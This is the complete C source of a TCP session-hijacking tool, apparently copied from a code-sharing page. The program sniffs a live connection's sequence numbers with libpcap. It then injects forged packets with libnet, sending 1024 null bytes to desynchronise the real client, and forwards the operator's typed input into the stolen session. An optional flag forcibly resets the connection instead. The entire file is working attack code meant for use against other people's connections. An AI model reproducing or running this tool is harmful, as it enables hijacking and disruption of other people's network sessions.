1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226
|
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <libnet.h>
#include <pcap.h>
#include <signal.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/time.h>
#include <unistd.h>
#define lrandom(min, max) (random()%(max-min)+min)
struct seqack
{
u_long seq;
u_long ack;
};
void
devsrandom(void)
{
int fd;
u_long seed;
fd = open("/dev/urandom", O_RDONLY);
if (fd == -1)
{
fd = open("/dev/random", O_RDONLY);
if (fd == -1)
{
struct timeval tv;
gettimeofday(&tv, NULL);
srandom((tv.tv_sec ^ tv.tv_usec) * tv.tv_sec * tv.tv_usec ^ tv.tv_sec);
return;
}
}
read(fd, &seed, sizeof(seed));
close(fd);
srandom(seed);
}
void
getseqack(char *interface, u_long srcip, u_long dstip, u_long sport, u_long dport, struct seqack *sa)
{
pcap_t *pt;
char ebuf[PCAP_ERRBUF_SIZE];
u_char *buf;
struct ip iph;
struct tcphdr tcph;
int ethrhdr;
pt = pcap_open_live(interface, 65535, 1, 60, ebuf);
if (!pt)
{
printf("pcap_open_live: %s\n", ebuf);
exit(-1);
}
switch (pcap_datalink(pt))
{
case DLT_EN10MB:
case DLT_EN3MB:
ethrhdr = 14;
break;
case DLT_FDDI:
ethrhdr = 21;
break;
case DLT_SLIP:
ethrhdr = 16;
break;
case DLT_NULL:
case DLT_PPP:
ethrhdr = 4;
break;
case DLT_RAW:
ethrhdr = 0;
default:
printf("pcap_datalink: Can't figure out how big the ethernet header is.\n");
exit(-1);
}
printf("Waiting for SEQ/ACK to arrive from the srcip to the dstip.\n");
printf("(To speed things up, try making some traffic between the two, /msg person asdf\n\n");
for (;;)
{
struct pcap_pkthdr pkthdr;
buf = (u_char *) pcap_next(pt, &pkthdr);
if (!buf)
continue;
memcpy(&iph, buf + ethrhdr, sizeof(iph));
if (iph.ip_p != IPPROTO_TCP)
continue;
if ((iph.ip_src.s_addr != srcip) || (iph.ip_dst.s_addr != dstip))
continue;
memcpy(&tcph, buf + ethrhdr + sizeof(iph), sizeof(tcph));
if ((tcph.th_sport != htons(sport)) || (tcph.th_dport != htons(dport)))
continue;
if (!(tcph.th_flags & TH_ACK))
continue;
printf("Got packet! SEQ = 0x%lx ACK = 0x%lx\n", htonl(tcph.th_seq), htonl(tcph.th_ack));
sa->seq = htonl(tcph.th_seq);
sa->ack = htonl(tcph.th_ack);
pcap_close(pt);
return;
}
}
void
sendtcp(u_long srcip, u_long dstip, u_long sport, u_long dport, u_char flags, u_long seq, u_long ack, char *data, int datalen)
{
u_char *packet;
int fd, psize;
devsrandom();
psize = LIBNET_IP_H + LIBNET_TCP_H + datalen;
libnet_init_packet(psize, &packet);
if (!packet)
libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
fd = libnet_open_raw_sock(IPPROTO_RAW);
if (fd == -1)
libnet_error(LIBNET_ERR_FATAL, "libnet_open_raw_sock failed\n");
libnet_build_ip(LIBNET_TCP_H + datalen, 0, random(), 0, lrandom(128, 255), IPPROTO_TCP, srcip, dstip, NULL, 0, packet);
libnet_build_tcp(sport, dport, seq, ack, flags, 65535, 0, (u_char *) data, datalen, packet + LIBNET_IP_H);
if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H + datalen) == -1)
libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
libnet_write_ip(fd, packet, psize);
libnet_close_raw_sock(fd);
libnet_destroy_packet(&packet);
}
struct seqack sa;
u_long srcip, dstip, sport, dport;
void
sighandle(int sig)
{
printf("Closing connection..\n");
sendtcp(srcip, dstip, sport, dport, TH_RST, sa.seq, 0, NULL, 0);
printf("Done, Exiting.\n");
exit(0);
}
int
main(int argc, char *argv[])
{
char *ifa = argv[1];
char buf[4096];
int reset = 0;
signal(SIGTERM, sighandle);
signal(SIGINT, sighandle);
if (argc < 6)
{
printf("Usage: %s <interface> <src ip> <src port> <dst ip> <dst port> [-r]\n", argv[0]);
printf("<interface>\t\tThe interface you are going to hijack on.\n");
printf("<src ip>\t\tThe source ip of the connection.\n");
printf("<src port>\t\tThe source port of the connection.\n");
printf("<dst ip>\t\tThe destination IP of the connection.\n");
printf("<dst port>\t\tThe destination port of the connection.\n");
printf("[-r]\t\t\tReset the connection rather than hijacking it.\n");
printf("\nCoded by spwny, Inspiration by cyclozine (http://www.geocities.com/stasikous).\n");
exit(-1);
}
if (argv[6] && !strcmp(argv[6], "-r") )
reset = 1;
srcip = inet_addr(argv[2]);
dstip = inet_addr(argv[4]);
sport = atol(argv[3]);
dport = atol(argv[5]);
if (!srcip)
{
printf("%s is not a valid ip.\n", argv[2]);
exit(-1);
}
if (!dstip)
{
printf("%s is not a valid ip.\n", argv[4]);
exit(-1);
}
if ((sport > 65535) || (dport > 65535) || (sport < 1) || (dport < 1))
{
printf("The valid TCP port range is 1-1024.\n");
exit(-1);
}
getseqack(ifa, srcip, dstip, sport, dport, &sa);
if (reset)
{
sendtcp(srcip, dstip, sport, dport, TH_RST, sa.seq, 0, NULL, 0);
printf("\nConnection has been reset.\n");
return 0;
}
/*
* Sending 1024 of zero bytes so the real owner of the TCP connection
* wont be able to get us out of sync with the SEQ.
*/
memset(&buf, 0, sizeof(buf));
sendtcp(srcip, dstip, sport, dport, TH_ACK | TH_PUSH, sa.seq, sa.ack, buf, 1024);
sa.seq += 1024;
printf("Starting hijack session, Please use ^C to terminate.\n");
printf("Anything you enter from now on is sent to the hijacked TCP connection.\n");
while (fgets(buf, sizeof(buf) - 1, stdin))
{
sendtcp(srcip, dstip, sport, dport, TH_ACK | TH_PUSH, sa.seq, sa.ack, buf, strlen(buf));
sa.seq += strlen(buf);
memset(&buf, 0, sizeof(buf));
}
sendtcp(srcip, dstip, sport, dport, TH_ACK | TH_FIN, sa.seq, sa.ack, NULL, 0);
printf("Exiting..\n");
return (0);
} |
Partager